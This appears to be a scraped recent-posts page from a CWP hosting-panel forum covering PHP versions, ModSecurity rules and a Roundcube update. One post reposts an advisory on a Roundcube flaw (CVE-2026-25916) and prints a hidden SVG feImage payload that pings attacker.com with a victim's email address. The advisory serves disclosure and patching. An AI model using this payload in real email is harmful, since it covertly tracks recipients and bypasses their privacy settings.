Recent Posts
21
PHP Selector / Re: Support for PHP 8.4
« Last post by Wonder on February 11, 2026, 11:53:01 PM »José Manuel had indicated to me that PHP 8.4 and PHP 8.5 were coming in the next major update.
As always, thanks for your messages.
I've come here because I need to install PHP 8.4 on CWP 8 / AlmaLinux 8. These links are for CWP9/Alma9 (I'm interested in php-fmp), and I've spent all day tweaking the paths so that it's 8 instead of 9, but I still can't install modules or I'm getting other errors. Is there any way to install PHP 8.4 correctly on CWP 8?
Thanks
22
Mod_Security / Re: Updated Comodo WAF Rules (2025/2026) for CWP & WordPress - Community Feedback
« Last post by Starburst on February 11, 2026, 08:40:41 PM »The OWASP CRS Ruleset is the best to use, and is free, and using their other half ModSecurity, it is easy to disable any rules needed.
23
Mod_Security / Re: Updated Comodo WAF Rules (2025/2026) for CWP & WordPress - Community Feedback
« Last post by overseer on February 11, 2026, 02:46:57 PM »Hi Bill, thanks for your efforts -- any contribution is valuable. I for one will have to pass though -- I can't have my servers' security depend on one person's lone efforts no matter how noble the intent. I've been making the latest OWASP rulesets work (omitting a list of false positives) and it is generally stable. Wish Comodo wouldn't have lost their identity and their product direction, but had to cope and life goes on!
24
Mod_Security / Updated Comodo WAF Rules (2025/2026) for CWP & WordPress - Community Feedback
« Last post by sminozzi on February 11, 2026, 02:10:34 PM »Hi everyone,
Since the official Comodo free ruleset hasn't been updated in over two years, I decided to take action. I have manually created an updated ruleset (2025/2026) to handle modern threats, specifically focusing on the new wave of AI scrapers and aggressive bots that cause unnecessary CPU/RAM drain.
I’ve been testing these rules on several high-traffic WordPress environments, and so far, the results are great: zero false positives in the admin area and significantly lower server load.
You can check out the updated rules and the documentation on my GitHub here:
https://github.com/sminozzi/SBB-WAF-Rules
Please feel free to test them out—I’m very open to feedback and suggestions if you see anything that could be improved!
Please note that there is no automatic installer for these updates. You will need the technical skills to manually replace the necessary files in your ModSecurity directories. Since environments can vary, I cannot provide individual support for the installation process. I highly recommend performing a full backup of your current rules before making any changes.
If you have any feedback or suggestions on how to improve these rules, please let me know. I'm always looking for ways to refine the protection and would love to hear about your experience with them.
Best regards,
Bill
Since the official Comodo free ruleset hasn't been updated in over two years, I decided to take action. I have manually created an updated ruleset (2025/2026) to handle modern threats, specifically focusing on the new wave of AI scrapers and aggressive bots that cause unnecessary CPU/RAM drain.
I’ve been testing these rules on several high-traffic WordPress environments, and so far, the results are great: zero false positives in the admin area and significantly lower server load.
You can check out the updated rules and the documentation on my GitHub here:
https://github.com/sminozzi/SBB-WAF-Rules
Please feel free to test them out—I’m very open to feedback and suggestions if you see anything that could be improved!
Please note that there is no automatic installer for these updates. You will need the technical skills to manually replace the necessary files in your ModSecurity directories. Since environments can vary, I cannot provide individual support for the installation process. I highly recommend performing a full backup of your current rules before making any changes.
If you have any feedback or suggestions on how to improve these rules, please let me know. I'm always looking for ways to refine the protection and would love to hear about your experience with them.
Best regards,
Bill
25
Updates / Re: Roundcube vulnerability
« Last post by Starburst on February 11, 2026, 02:01:52 PM »26
Updates / Re: Roundcube vulnerability
« Last post by overseer on February 11, 2026, 11:58:43 AM »Just to affirm Starburst's previous guide to update Roundcube in light of the current vulnerability:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-roundcube-webmail-to-version-1-5-11-in-cwp-on-almalinux-8-9/
or follow Sandeep's guide here:
https://www.alphagnu.com/topic/33-update-cwp-roundcube-mail-version-158-%E2%80%93-control-web-panel/
Simply update the Roundcube version number to 1.5.13 in the directions and download links and you will obtain a CWP-compatible LTS version of Roundcube, safe from the latest CVE.
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-roundcube-webmail-to-version-1-5-11-in-cwp-on-almalinux-8-9/
or follow Sandeep's guide here:
https://www.alphagnu.com/topic/33-update-cwp-roundcube-mail-version-158-%E2%80%93-control-web-panel/
Simply update the Roundcube version number to 1.5.13 in the directions and download links and you will obtain a CWP-compatible LTS version of Roundcube, safe from the latest CVE.
27
PHP / Re: how to install and configure relay extension for php-fpm83 in cwp
« Last post by overseer on February 10, 2026, 02:53:53 PM »I would look at this guide as a model:
https://www.alphagnu.com/topic/614-how-to-add-custom-php-fpm-84-85-support-to-cwp-on-almalinux-9x/
(You could try to customize the build scripts/extension scripts for 8.3 using this method.)
https://www.alphagnu.com/topic/614-how-to-add-custom-php-fpm-84-85-support-to-cwp-on-almalinux-9x/
(You could try to customize the build scripts/extension scripts for 8.3 using this method.)
28
PHP Selector / Re: Support for PHP 8.4
« Last post by Andrew C on February 10, 2026, 11:41:23 AM »Hello,
When will the change logs be updated. Still showing 13/11/2024 ?
Thanks
When will the change logs be updated. Still showing 13/11/2024 ?
Thanks
29
PHP Selector / Re: Support for PHP 8.4
« Last post by cHAp on February 09, 2026, 10:45:06 PM »Hello,
When will the major update be released?
When will the major update be released?
30
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« Last post by Starburst on February 09, 2026, 06:24:31 PM »Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
Field Value
CVE CVE-2026-25916
Vendor Roundcube
Product Roundcube Webmail
Affected Versions <1.5.13, <1.6.13
Disclosure Date 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
Code: [Select]
text<svg width="1" height="1" style="position:absolute;left:-9999px;">
<defs>
<filter id="t">
<feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
</filter>
</defs>
<rect filter="url(#t)" width="1" height="1"/>
</svg>It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
Field Value
CVE CVE-2026-25916
Vendor Roundcube
Product Roundcube Webmail
Affected Versions <1.5.13, <1.6.13
Disclosure Date 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
